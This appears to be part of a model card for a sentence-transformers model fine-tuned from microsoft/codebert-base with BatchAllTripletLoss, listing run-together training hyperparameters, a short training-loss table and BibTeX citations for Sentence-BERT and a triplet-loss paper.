BatchAllTripletLossper_device_train_batch_size: 16per_device_eval_batch_size: 16num_train_epochs: 1multi_dataset_batch_sampler: round_robinoverwrite_output_dir: Falsedo_predict: Falseeval_strategy: noprediction_loss_only: Trueper_device_train_batch_size: 16per_device_eval_batch_size: 16per_gpu_train_batch_size: Noneper_gpu_eval_batch_size: Nonegradient_accumulation_steps: 1eval_accumulation_steps: Nonetorch_empty_cache_steps: Nonelearning_rate: 5e-05weight_decay: 0.0adam_beta1: 0.9adam_beta2: 0.999adam_epsilon: 1e-08max_grad_norm: 1num_train_epochs: 1max_steps: -1lr_scheduler_type: linearlr_scheduler_kwargs: {}warmup_ratio: 0.0warmup_steps: 0log_level: passivelog_level_replica: warninglog_on_each_node: Truelogging_nan_inf_filter: Truesave_safetensors: Truesave_on_each_node: Falsesave_only_model: Falserestore_callback_states_from_checkpoint: Falseno_cuda: Falseuse_cpu: Falseuse_mps_device: Falseseed: 42data_seed: Nonejit_mode_eval: Falseuse_ipex: Falsebf16: Falsefp16: Falsefp16_opt_level: O1half_precision_backend: autobf16_full_eval: Falsefp16_full_eval: Falsetf32: Nonelocal_rank: 0ddp_backend: Nonetpu_num_cores: Nonetpu_metrics_debug: Falsedebug: []dataloader_drop_last: Falsedataloader_num_workers: 0dataloader_prefetch_factor: Nonepast_index: -1disable_tqdm: Falseremove_unused_columns: Truelabel_names: Noneload_best_model_at_end: Falseignore_data_skip: Falsefsdp: []fsdp_min_num_params: 0fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}fsdp_transformer_layer_cls_to_wrap: Noneaccelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}deepspeed: Nonelabel_smoothing_factor: 0.0optim: adamw_torchoptim_args: Noneadafactor: Falsegroup_by_length: Falselength_column_name: lengthddp_find_unused_parameters: Noneddp_bucket_cap_mb: Noneddp_broadcast_buffers: Falsedataloader_pin_memory: Truedataloader_persistent_workers: Falseskip_memory_metrics: Trueuse_legacy_prediction_loop: Falsepush_to_hub: Falseresume_from_checkpoint: Nonehub_model_id: Nonehub_strategy: every_savehub_private_repo: Nonehub_always_push: Falsegradient_checkpointing: Falsegradient_checkpointing_kwargs: Noneinclude_inputs_for_metrics: Falseinclude_for_metrics: []eval_do_concat_batches: Truefp16_backend: autopush_to_hub_model_id: Nonepush_to_hub_organization: Nonemp_parameters: auto_find_batch_size: Falsefull_determinism: Falsetorchdynamo: Noneray_scope: lastddp_timeout: 1800torch_compile: Falsetorch_compile_backend: Nonetorch_compile_mode: Noneinclude_tokens_per_second: Falseinclude_num_input_tokens_seen: Falseneftune_noise_alpha: Noneoptim_target_modules: Nonebatch_eval_metrics: Falseeval_on_start: Falseuse_liger_kernel: Falseeval_use_gather_object: Falseaverage_tokens_across_devices: Falseprompts: Nonebatch_sampler: batch_samplermulti_dataset_batch_sampler: round_robin| Epoch | Step | Training Loss |
|---|---|---|
| 0.2393 | 500 | 0.1875 |
| 0.4787 | 1000 | 0.1815 |
| 0.7180 | 1500 | 0.24 |
| 0.9574 | 2000 | 0.1596 |
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
@misc{hermans2017defense,
title={In Defense of the Triplet Loss for Person Re-Identification},
author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
year={2017},
eprint={1703.07737},
archivePrefix={arXiv},
primaryClass={cs.CV}
}
Base model
microsoft/codebert-base